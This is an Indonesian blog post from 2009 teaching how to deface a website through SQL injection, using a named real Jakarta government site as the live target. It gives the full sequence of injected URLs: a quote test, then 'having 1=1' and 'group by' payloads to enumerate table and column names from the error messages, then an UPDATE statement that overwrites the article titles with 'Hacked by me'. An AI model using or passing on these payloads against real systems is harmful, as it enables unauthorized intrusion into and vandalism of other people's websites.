Senin, 07 Desember 2009

Deface dengan SQL Injection

Halo… teman2!! Ketemu lagi dengan makhluk tuhan yang paling ganteng -.-” hehehe kek lagu aja yah…
yaudah gak papa kek lagu… yang penting gw tetap ganteng

Tutorial kali ini adalah deface melalui url dengan menggunakan sql injection… hhmm… untuk tutor kali ini kita (loe aja kali!!) akan menggunakan sebuah web untuk percobaan…

Webnya adalah…

http://pemakaman.jakarta.go.id/
hehehe… web pemerintah… gak papa kok yang perlu kita lakukan pertama adalah membuka salah satu link artikelnya, contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102

untuk mengetahui apakah web tersebut terkena bugs sql injection… kita akan menambahkan satu karakter ‘ setelah kode artikel… contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′

Oooopppsss keknya terjadi error….

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Unclosed quotation mark before the character string ‘102′ order by creationdate DESC’.

/artikel.asp, line 230

berarti bisa dipastikan klo website tersebut terkena bugs…
oke… ayo kita buat error lagi, sampe orgasme… loh!?
kali ini kita membuat error dengan : having 1=1;–
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ having 1=1;–

errornya seperti ini :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/artikel.asp, line 230

py_Naskah.naskah_id ini adalah nama tabel dan kolom database
py_Naskah => nama tabel
naskah_id => nama kolom

sekarang kita cari tau tabel berikutnya…
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.naskah_id having 1=1;–

error lagi :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230

sekarang kita dapat py_Naskah.category
berarti kitambah di urlnya
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id having 1=1;–

error berikutnya :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230

urlnya menjadi :
http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;–

nah kita udah dapat nama kolom judulnya yaitu : py_Naskah.title

untuk merubahnya kita menggunakan cara berikut :

http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ update py_Naskah set title=’Hacked by me’;–

Hasilnya

Oke that’s all

Good Luck
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)